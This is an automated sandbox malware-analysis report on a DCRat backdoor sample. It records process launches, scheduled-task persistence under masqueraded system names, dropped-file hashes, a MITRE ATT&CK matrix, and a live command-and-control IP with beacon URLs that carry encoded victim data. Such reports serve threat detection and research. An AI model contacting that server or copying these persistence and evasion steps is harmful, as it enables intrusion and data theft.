      Source: C:\Users\user\Desktop\w9d568i4Ia.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\lJjcBPjH5n.bat" Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\w9d568i4Ia.exe "C:\Users\user\Desktop\w9d568i4Ia.exe"
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.33","PCName":"138727","UserName":"user","IpInfo":{"ip":"84.17.52.43","city":"Zurich","region":"Zurich","country":"CH","loc":"47.43,8.5718","org":"Not specified - Switzerland","postal":"000000","timezone":"Europe/Zurich"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: },"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Sleeping","SleepTimeout":5}
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: {"ServerType":"C#","ServerVer":"4.5.33","PCName":"138727","UserName":"user","IpInfo":{"ip":"84.17.52.43","city":"Zurich","region":"Zurich","country":"CH","loc":"47.43,8.5718","org":"Not specified - Switzerland","postal":"000000","timezone":"Europe/Zurich"},"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
      Source: vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: },"WinVer":"Windows 10 Enterprise 64 Bit","TAG":"","isAdmin":"Y","GPUName":"Unknown (Unknown)","CPUName":"Unknown (Unknown)","isMicrophone":"Y","isWebcam":"N","ACTWindow":"Program Manager","ActivityStatus":"Active","SleepTimeout":5}
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeQueries volume information: C:\Users\user\Desktop\w9d568i4Ia.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe VolumeInformationJump to behavior
      Source: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exeQueries volume information: C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeQueries volume information: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exeQueries volume information: C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeQueries volume information: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe VolumeInformationJump to behavior
      Source: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exeQueries volume information: C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe VolumeInformation
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeQueries volume information: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe VolumeInformation
      Source: C:\Program Files (x86)\windows nt\backgroundTaskHost.exeQueries volume information: C:\Program Files (x86)\windows nt\backgroundTaskHost.exe VolumeInformation
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeQueries volume information: C:\Users\user\Desktop\w9d568i4Ia.exe VolumeInformation
      Source: C:\Users\user\Desktop\w9d568i4Ia.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected DCRat
      Source: Yara matchFile source: 00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: w9d568i4Ia.exe PID: 3240, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: vLhkFRJoasJvKPEeUEtn.exe PID: 5692, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected DCRat
      Source: Yara matchFile source: 00000000.00000002.359262511.0000000012A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: w9d568i4Ia.exe PID: 3240, type: MEMORYSTR
      Source: Yara matchFile source: Process Memory Space: vLhkFRJoasJvKPEeUEtn.exe PID: 5692, type: MEMORYSTR

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts11
      Windows Management Instrumentation      		1
      Scheduled Task/Job      		12
      Process Injection      		12
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services11
      Archive Collected Data      		Exfiltration Over Other Network Medium1
      Encrypted Channel      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default Accounts1
      Scheduled Task/Job      		Boot or Logon Initialization Scripts1
      Scheduled Task/Job      		1
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
      Ingress Tool Transfer      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain Accounts1
      Scripting      		Logon Script (Windows)Logon Script (Windows)121
      Virtualization/Sandbox Evasion      		Security Account Manager121
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
      Non-Application Layer Protocol      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
      Process Injection      		NTDS1
      Application Window Discovery      		Distributed Component Object ModelInput CaptureScheduled Transfer11
      Application Layer Protocol      		SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
      Deobfuscate/Decode Files or Information      		LSA Secrets1
      File and Directory Discovery      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Scripting      		Cached Domain Credentials114
      System Information Discovery      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup Items2
      Software Packing      		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 706211 Sample: w9d568i4Ia.exe Startdate: 20/09/2022 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic 2->36 38 Antivirus detection for dropped file 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 42 9 other signatures 2->42 7 w9d568i4Ia.exe 4 28 2->7         started        11 vLhkFRJoasJvKPEeUEtn.exe 14 2 2->11         started        14 WmiPrvSE.exe 3 2->14         started        16 18 other processes 2->16 process3 dnsIp4 26 C:\Users\user\...\vLhkFRJoasJvKPEeUEtn.exe, PE32 7->26 dropped 28 C:\Users\user\Pictures\...\RCX9E80.tmp, PE32 7->28 dropped 30 C:\Users\user\Pictures\...\RCX9CF9.tmp, PE32 7->30 dropped 32 19 other files (17 malicious) 7->32 dropped 44 Creates processes via WMI 7->44 46 Drops executable to a common third party application directory 7->46 18 cmd.exe 7->18         started        34 194.190.152.128, 49711, 49712, 49713 RSHB-ASRU Russian Federation 11->34 file5 signatures6 process7 process8 20 conhost.exe 18->20         started        22 w32tm.exe 18->22         started        24 w9d568i4Ia.exe 18->24         started       

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      w9d568i4Ia.exe85%ReversingLabsByteCode-MSIL.Backdoor.DCRat
      w9d568i4Ia.exe72%VirustotalBrowse
      w9d568i4Ia.exe61%MetadefenderBrowse
      w9d568i4Ia.exe100%AviraHEUR/AGEN.1203070
      w9d568i4Ia.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmp100%AviraHEUR/AGEN.1203070
      C:\Users\user\Desktop\RCX999C.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\windows nt\backgroundTaskHost.exe100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe100%AviraHEUR/AGEN.1203070
      C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmp100%AviraHEUR/AGEN.1203070
      C:\Users\user\Desktop\RCX974A.tmp100%AviraHEUR/AGEN.1203070
      C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\windows nt\RCXABD4.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmp100%AviraHEUR/AGEN.1203070
      C:\Users\user\Pictures\Camera Roll\RCX9E80.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\windows nt\RCXAE26.tmp100%AviraHEUR/AGEN.1203070
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\sihost.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmp100%Joe Sandbox ML
      C:\Users\user\Desktop\RCX999C.tmp100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmp100%Joe Sandbox ML
      C:\Program Files (x86)\windows nt\backgroundTaskHost.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\WmiPrvSE.exe100%Joe Sandbox ML
      C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA6F0.tmp100%Joe Sandbox ML
      C:\Users\user\Desktop\RCX974A.tmp100%Joe Sandbox ML
      C:\Users\user\Pictures\Camera Roll\RCX9CF9.tmp100%Joe Sandbox ML
      C:\Program Files (x86)\windows nt\RCXABD4.tmp100%Joe Sandbox ML
      C:\Program Files (x86)\Microsoft SQL Server\110\Shared\RCXA887.tmp100%Joe Sandbox ML
      C:\Users\user\Pictures\Camera Roll\RCX9E80.tmp100%Joe Sandbox ML
      C:\Program Files (x86)\windows nt\RCXAE26.tmp100%Joe Sandbox ML

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      0.0.w9d568i4Ia.exe.750000.0.unpack100%AviraHEUR/AGEN.1203070Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://194.190.152.128/downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH30%Avira URL Cloudsafe
      http://194.190.152.128/downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3&dcf04bdc61b03a0822281dccebb6bfa0=be0f637a60d67b7d74fe87fa45ca0c84&8777d2f9c3d9f9dbfdad95d8b9ba9864=gZjFjYxYWZ5ImN0MDOwEjY2AjZ5czMmV2NwIGZiFGM1AzYyEWMyEGN&iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH30%Avira URL Cloudsafe
      http://194.190.152.128/downloads/0%Avira URL Cloudsafe
      http://194.190.152.12880%Avira URL Cloudsafe
      http://194.190.152.1280%Avira URL Cloudsafe
      http://194.190.152.128/downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa60%Avira URL Cloudsafe
      http://194.190.152.128x0%Avira URL Cloudsafe
      http://194.190.152.128/downloads/0%VirustotalBrowse
      http://194.190.152.128/downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&10f03f723aff9ffb3fee0f8177e9e6b3=0VfiIiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3W0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://194.190.152.128/downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3&dcf04bdc61b03a0822281dccebb6bfa0=be0f637a60d67b7d74fe87fa45ca0c84&8777d2f9c3d9f9dbfdad95d8b9ba9864=gZjFjYxYWZ5ImN0MDOwEjY2AjZ5czMmV2NwIGZiFGM1AzYyEWMyEGN&iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3true
      • Avira URL Cloud: safe
      		unknown
      http://194.190.152.128/downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6WCIomBqw&eed4ad65d678198d0c3734e0ead7b030=AZkFTZkN2M1AzM1ITM5UGM4QzM0cTY0YWNyUWYmFTM4MTZjJTMhZ2M0gDMxUTN3YTOxATOyADO&8777d2f9c3d9f9dbfdad95d8b9ba9864=gNkBzMlhDNwUWY3czMyETNzQWMilTZiVWNwITZhNWYilzN1Y2M3QWM&10f03f723aff9ffb3fee0f8177e9e6b3=0VfiIiOiMWNxEmM0ATN4IzNhFTM4EDZiJzM5gTNjZWZ0ETZyYGMiwiI2kjMwATZmFWY2IGN2UTYzQWYjZWZlljZyEmNzMjYkFjYkRjY3ATYkJiOikjY0QjMyMTMxMmZkZ2MyY2MkFTYykTZkJDZ2M2YyITOiwiIwgTYkNTN1IDO5MjN1IDMzMGZ2EWNyE2NyQjM4QmM5cDMiZzY3EWNhJiOiAjZihzNjVWMyMWMmNjNjF2YzcjZwMTYwE2YlVzNxITYis3Wtrue
      • Avira URL Cloud: safe
      		unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://194.190.152.128/downloads/vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537115944.0000000002A0B000.00000004.00000800.00020000.00000000.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      		unknown
      http://194.190.152.1288vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		low
      http://194.190.152.128xvLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537349940.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544761572.0000000002D15000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544094824.0000000002CCC000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      		low
      http://www.maxmind.comvLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537892020.0000000002A43000.00000004.00000800.00020000.00000000.sdmpfalse
        		high
        http://194.190.152.128/downloads/Pipepollapi.php?iC6xQo5dJpokCi4eIn0=fwF5fxU0YsMAMpZQsHlIVmDvSw9kuH3vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537349940.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://194.190.152.128vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537349940.0000000002A1B000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544761572.0000000002D15000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544094824.0000000002CCC000.00000004.00000800.00020000.00000000.sdmpfalse
        • Avira URL Cloud: safe
        		unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namew9d568i4Ia.exe, 00000000.00000002.359026435.0000000002C72000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.537349940.0000000002A1B000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          http://194.190.152.128/downloads/Pipepollapi.php?wFLaQKhizqFIZe4ibySgNJDenOk=g22zdeBu3xOP7Tp51xQFNa6vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.538339458.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544279459.0000000002CE2000.00000004.00000800.00020000.00000000.sdmp, vLhkFRJoasJvKPEeUEtn.exe, 00000006.00000002.544094824.0000000002CCC000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          194.190.152.128
          		unknownRussian Federation
          		41615RSHB-ASRUtrue

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:706211
          Start date and time:2022-09-20 14:16:23 +02:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 35s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:w9d568i4Ia.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:40
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@28/33@0/1
          EGA Information:Failed
          HDC Information:Failed
          HCA Information:
          • Successful, ratio: 66%
          • Number of executed functions: 660
          • Number of non-executed functions: 12
          Cookbook Comments:
          • Found application associated with file extension: .exe

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.190.159.23, 20.190.159.2, 20.190.159.73, 20.190.159.4, 40.126.31.67, 40.126.31.71, 20.190.159.0, 20.190.159.64, 20.82.210.154
          • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, prda.aadg.msidentity.com, login.live.com, arc.trafficmanager.net, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, arc.msn.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
          • Execution Graph export aborted for target WmiPrvSE.exe, PID 5620 because it is empty
          • Execution Graph export aborted for target WmiPrvSE.exe, PID 648 because it is empty
          • Execution Graph export aborted for target backgroundTaskHost.exe, PID 2728 because it is empty
          • Execution Graph export aborted for target backgroundTaskHost.exe, PID 5256 because it is empty
          • Execution Graph export aborted for target sihost.exe, PID 5424 because it is empty
          • Execution Graph export aborted for target sihost.exe, PID 5984 because it is empty
          • Execution Graph export aborted for target vLhkFRJoasJvKPEeUEtn.exe, PID 5604 because it is empty
          • Execution Graph export aborted for target vLhkFRJoasJvKPEeUEtn.exe, PID 5692 because it is empty
          • Execution Graph export aborted for target w9d568i4Ia.exe, PID 3240 because it is empty
          • Execution Graph export aborted for target w9d568i4Ia.exe, PID 6484 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          14:17:33Task SchedulerRun new task: vLhkFRJoasJvKPEeUEtn path: "C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe"
          14:17:34Task SchedulerRun new task: vLhkFRJoasJvKPEeUEtnv path: "C:\Users\user\Pictures\Camera Roll\vLhkFRJoasJvKPEeUEtn.exe"
          14:17:37Task SchedulerRun new task: sihost path: "C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe"
          14:17:41Task SchedulerRun new task: sihosts path: "C:\Program Files (x86)\adobe\Acrobat Reader DC\sihost.exe"
          14:17:44Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe"
          14:17:45Task SchedulerRun new task: WmiPrvSEW path: "C:\Program Files (x86)\microsoft sql server\110\Shared\WmiPrvSE.exe"
          14:17:48Task SchedulerRun new task: backgroundTaskHost path: "C:\Program Files (x86)\windows nt\backgroundTaskHost.exe"
          14:17:48Task SchedulerRun new task: backgroundTaskHostb path: "C:\Program Files (x86)\windows nt\backgroundTaskHost.exe"
          14:19:12API Interceptor91x Sleep call for process: vLhkFRJoasJvKPEeUEtn.exe modified

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          194.190.152.1283pqdFTqin9.exeGet hashmaliciousBrowse

            Domains

            No context

            ASNs

            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
            RSHB-ASRU3pqdFTqin9.exeGet hashmaliciousBrowse
            • 194.190.152.128
            nJX6vEzSO5.exeGet hashmaliciousBrowse
            • 194.190.153.31
            X3JoqrBG6b.dllGet hashmaliciousBrowse
            • 194.190.152.209
            Hlf35fELn8.exeGet hashmaliciousBrowse
            • 194.190.152.209
            U6EbIncPHD.exeGet hashmaliciousBrowse
            • 194.190.153.41

            JA3 Fingerprints

            No context

            Dropped Files

            No context

            Created / dropped Files

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\66fc9ff0ee96c2

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:ASCII text, with very long lines, with no line terminators
            Category:dropped
            Size (bytes):984
            Entropy (8bit):5.9088868128879435
            Encrypted:false
            SSDEEP:24:vSsbQ3DPsZw8qQn5VLp991IVYn4+64BtB6zlBpVTG1dtDRhyh:vSR3Qw8PjIVm2/sxA
            MD5:AA27E6B5087001893DD17B935BCDF7BC
            SHA1:A024FBB46F9818A73EDB05F5A0C55103D38A634E
            SHA-256:515359F6A4695A45FBDAD32A30BD82013B17BF6F468A2BEEE81A150D880B057B
            SHA-512:0A715A2DCBBAA175A2DBDEF46B979706489ABB91B4C37ABBE972759D58FCCD2F6CCB172E7728D1B1188D47DB9B47292F3680210E6754B250BF348DB2E5132ED3
            Malicious:false
            Preview:frNmGInRG63XygtzzbbyTqXCkmARshQtfM18HakhKVE1QYNWvQi3jypzTKCdHWjiqJ2lovsY03n8lgwLYngb9WKrhCo6YGayvgLGgms9iKCqLqNxX1FezHjT9KElGv9udyMFVqpw5g2yTdg0z1ihB58n61GVhG3wKSMWdIbrMSiTPu9foNwPNcthzjIdjTOymGnBRJXqZ0VsWpYL1lqUTojrjoh4A8I2DuqIH8Of0G0WHAKKK6l8m4e8g5bmmcqbscpm8PE3WLeNxNkidWuDWJPJPsmLgl3YZYnoViM41slbaRKTV2IPrmEiNgXQn3WvSFyZj5N5KzMniys8hT0ocnqwUEbzK6R8WzJUcvtZpNE2abAYxYtUDsToZBEfeYvOiNRspXfvja8PixV2ECBvN64nge4aqO5Qb0TMKRtZ37umtEFmpMbbW9BlTnLKdEEVfrxseIswSm2PMR4cYSvexd4czr3gFj6y3YHBQXHgdoIuGwZBstvKTjiBxU3wPLqtpEWxK2LBKOBIUKWCS2yWxveT0GO6dVRR8ZEBZm00huAFiaqm70dWXT64jD6DoPhy6tJ5FUnqB7yDvZuaZl8n254ocKbWpwMSMLJzQugmNxUZe2IKSgoCQ46Azec53QBOvg1kQ5KoEVaEleKkBREIIJBSOI9vSlt6vFn8Bi4WW975d1ZUU24lM2GmeiVH6YWdleSf0LicWswILGyWtoaZqIu39BddMwa7neT9j3eJUcOeF7aYu9YR77xdtZgysFPjRyfrxyxzKREO3QxBlFsNYJAqrzQJXpaPMpMRctl5MjGq2jkdleNnWBLIyyA7incf0zBNDgj2dxBzCTyHOwi2bx2KdDcnsnWiGkzChWZF5VJjAWFeA2swFkDC60uAD5J0acscdvk2Wd6GoTKH87m04kdggwGrmZB9LSJhnnBPS0Zln7YnqmCFTS6z9L5ro2Q7b64VKmdU6XiEL12jYdA9X5q2

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA23A.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
            Entropy (8bit):6.368877505443787
            Encrypted:false
            SSDEEP:24576:2fee0xoE3Ivkutg+7x3ME9hkLERMkVLZ:2GegmCGKWVL
            MD5:13A66808F50F022C7FFF8C24D0F0834F
            SHA1:BCAF459E6AA2531F66786AEBE0529DD1272CC018
            SHA-256:488C7A7BD3D99F18CE23113014407464FDABAE03DAEE6B1669EFBC1CFF32AA32
            SHA-512:9BCC5305138870BF90AC3282BAFFC63A48BA6318403F1A8828D9CFCBCBB9E3BAD099424397B626D0453151E278C7E0FA4827DFF06903FD0B68DA82A04758024E
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....a.b.....................6......^3... ...@....@.. ....................................@..................................3..K.......|............................................................................ ............... ..H............text...d.... ...................... ..`.sdata.../...@...0..................@....rsrc...|............H..............@..@.reloc...............L..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

            C:\Program Files (x86)\Adobe\Acrobat Reader DC\RCXA3A3.tmp

            Download File
            Process:C:\Users\user\Desktop\w9d568i4Ia.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):937472
